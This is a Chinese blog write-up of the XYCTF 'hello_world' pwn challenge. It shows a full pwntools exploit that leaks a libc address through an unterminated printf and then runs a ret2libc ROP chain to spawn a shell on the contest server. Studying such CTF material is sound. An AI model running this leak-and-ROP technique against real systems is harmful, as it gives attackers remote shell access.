[XYCTF新生赛]-PWN:hello_world(签到)解析(泄露libc_start_call_main获取libc地址)

已于 2024-05-03 00:30:15 修改
阅读量241 收藏
点赞数 3
分类专栏: PWN 文章标签: 前端 linux 数据库 安全 网络安全
于 2024-04-04 22:38:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/137380760
版权

查看保护

查看ida

这里的printf没有格式化字符串漏洞,但是我们依旧可以填充栈来利用printf泄露栈上信息

根据我们能填充的字节数来看,我们无法泄露出libc_start_main+128的地址,但是可以泄露libc_start_call_main+128的地址,利用加上或减去相对libc_start_main的偏移依旧可以得出libc_start_main的地址,实现ret2libc。

完整exp:

from pwn import*
context(log_level='debug')
p=remote('xyctf.top',42665)

payload=b'a'*0x28
p.sendafter(b'please input your name:',payload)
p.recvuntil(b'Welcome to XYCTF! ')
p.recvuntil(b'a'*0x28)
libc_start_call_main128=u64(p.recv(6).ljust(8,b'\x00'))
print(hex(libc_start_call_main128))
libc_start_main128=libc_start_call_main128+0xb0
libc_start_main=libc_start_main128-128
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libcbase=libc_start_main-libc.sym['__libc_start_main']
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
pop_rdi=libcbase+0x2a3e5
ret=libcbase+0x29139
payload=b'a'*0x28+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendafter(b'please input your name:',payload)

p.interactive()

clxhzg
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
arm64入栈出栈_X86-64和ARM64用户栈的结构 (3) ---_start到main
weixin_39593593的博客
12-19 267
介绍将以如下函数为例:#include#include int func_A(int x1, int x2, int x3, int x4, int x5, int x6){int sum = 0;sum = x1 + x2;sum = sum + x3 + x4;sum = sum + x5 + x6;return sum;}int func_B(int x1, int x2, int x3,...
c语言main函数的顺序,深度剖析c语言main函数---main函数的执行顺序
weixin_36081677的博客
05-21 2456
在之前的文章中,介绍了main函数的返回值 和 main函数的传参,本文主要介绍一下main函数的执行顺序。可能有的人会说,这还用说,main函数肯定是程序执行的第一个函数。那么,事实果然如此吗?相信在看了本文之后,会有不一样的认识。为什么说main()是程序的入口linux系统下程序的入口是”_start”,这个函数是linux系统库(Glibc)的一部分,当我们的程序和Glibc链接在一起形成...
ctfshow pwn——PWN签到题、pwn02
qq_55233040的博客
01-24 5026
PWNPWN签到pwn02 PWN签到题 nc连上就行了 pwn02 check一下是32位,用32位ida打开看看 很直白的pwnme函数 9字节的空间读入了50字节,产生了栈溢出 用pwndbg调试一下 可以看到ebp前读取了9个字节,而32位程序的ebp占用4个字节,所以eip被覆盖成为ddde 回到ida,找到system函数 system函数在stack函数中,找到stack函数的位置: 写脚本 from pwn import * io = remote("pwn.challeng
ctfshow 内部 pwn 签到
SCP000111的博客
11-16 1631
ctfshow 内部 pwn 签到题 找了在刷题的中,不会做这道题,找了好久没找到wp,搞了几天,还怀疑题目出错了,结果一看有最近13天前做出来的,又认真在搞。最终搞出来了,原来是csu,不想让后来人向我一样没有wp可以看,解出来马上就写了博客hhhh。 先放图片,2021.11.16该代码可行 这个我找了好久。都没找到wp,但是我看到了一个人的博客,无意间发现他的题目似乎与这道题一样,于是尝试求解,解出,在这里感谢下作者。这里 作者是偏有宸机,他那里有更好的解释。Ret2libc_64[csu及get
阿里云2024 CTF pwn 签到
最新发布
m0_74220442的博客
03-27 1175
定义了两个数组,通过给第二个数组赋值来绕过各种判断语句 到达漏洞函数,通过第一个漏洞函数泄露libc地址,通过第二个漏洞函数 进行栈溢出并且能够绕过canary 执行rop链。
2018护网杯的pwn签到题(详细过程)
dengshanyi7201的博客
10-14 610
题目: 链接:https://pan.baidu.com/s/1WcO-y2MQ6Wb17PqL2dxyyA 提取码:z5a7 首先找保护机制 难受 保护全开!! 运行一下,发现只有一个输入点。 ida分析一波 发现只要满足 v7=0x7FFFFFFFFFFFFFFFLL 还有v8=0.1 但是在payload去传值需要用0x????,这里可以了...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN:具有材料设计WebUI的ESP8266解除验证:antenna_bars:
01-28
无线网络ESP8266的Deauther具有简洁的Web界面 :sparkles: 支持在上进行或一次通过| | | 快速响应的Material Design UI,带有可选的暗模式集成的(完全定制) WiFi客户端模式-在WiFi网络上访问Wi-PWN 信息页面,其中...
basics-of-pwn:我的课程是有关基本的二进制漏洞利用的。:diving_mask:
04-12
目录[堆栈溢出] [跳转到任意地址] [Shellcode编写] [NOP链] [使用python pwntools模轻松利用堆栈溢出] [格式化字符串漏洞] [格式化字符串说明符] [读取任意数据] [开发] [堆溢出] [安全技术] [不可执行的堆栈(NX...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 660
pwn 64位 泄露libc版本
hnctf-pwn-week2
m0_64174759的博客
11-26 910
逆向,整数溢出,orw,栈迁移,ret2csu,partial overwrite
写给大忙人看的教程,一文形象生动地让你理解linux
03-11 3754
专门写给大忙人的linux教程,看不懂你打我
linux 断点调试技巧 包教包会 适合新手 萌新 进阶 老司机。 步骤详细 ,不怕自己学不会
这是一个c++热爱者的博客哟
06-26 1520
使用 gdb 之前 ,要使用 gcc -g 源文件 生成包含调试信息的可执行文件。然后 gdb 可执行文件首先要明白 断点的基本调试单步调试 step over 顺序执行每条程序,如果这条程序是一个函数,就不会进入方法体中,而是把这个函数当成一条简单语句执行单步跳入 ,step into 如果当前行断点是一个方法,则进入当前方法体内。单步跳出 step out 跳出进入的方法体以下面的函数为例子 先不打断点 , 使用start 命令 ,相当于
CTF---Web---文件包含---11---构造访问路径+过滤php代码
qq_22160557的博客
08-01 2123
文章目录前言一、题目描述二、解题步骤1、寻找上传点2、上传一句话木马3、构造访问路径3、绕过php代码过滤4、蚁剑连接三、总结 前言 题目分类: CTF—Web—文件包含—11—构造访问路径+过滤php代码 一、题目描述 题目:Bugku—文件包含2 http://114.67.246.176:13862/index.php?file=hello.php 二、解题步骤 1、寻找上传点 Step1:右键源代码,发现上传页面upload.php 2、上传一句话木马 Step2:因上传文件有限制,所以将一
链接装载与库:第十一章——运行库
yelvens的博客
09-03 1048
除了之前的14个头文件,剩下的15个头文件(C89标准)为:assert.h、ctype.h、errno.h、float.h、limits.h、locale.h、math.h、setjmp.h、signal.h、stdarg.h、stddef.h、stdio.h、stdlib.h、string.h、time.h。glibc的启动过程在不同的情况下差别很大,比如静态的glibc和动态的glibc的差别,glibc用于可执行文件和用于共享库的差别,这样的差别可以组合出4种情况,这里只选取最简单的。
UNCTF2022Pwn和Reverse的部分题解(其他方向的签到题也有)
weixin_73290593的博客
11-21 1173
unctf的re和pwn部分题解
pwn(二)
小明的小书包Ya
09-28 2219
pwn(二) 写在文章开头的话:之前一直在学习pwn入门,但是pwn一直是门槛比较高的一门学问,于是前一段时间懈怠了,接下来一段时间会一天写一个模的writeup,如果遇到比较难的,不好理解的,我也会尽量理解好了,认为自己有比较好的理解方法的时候,才会来写出自己的一些看法和理解,可能会有两天到三天来查阅大量 文档才会有一个比较好的理解 - 荆轲刺秦王,潜心学安全 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值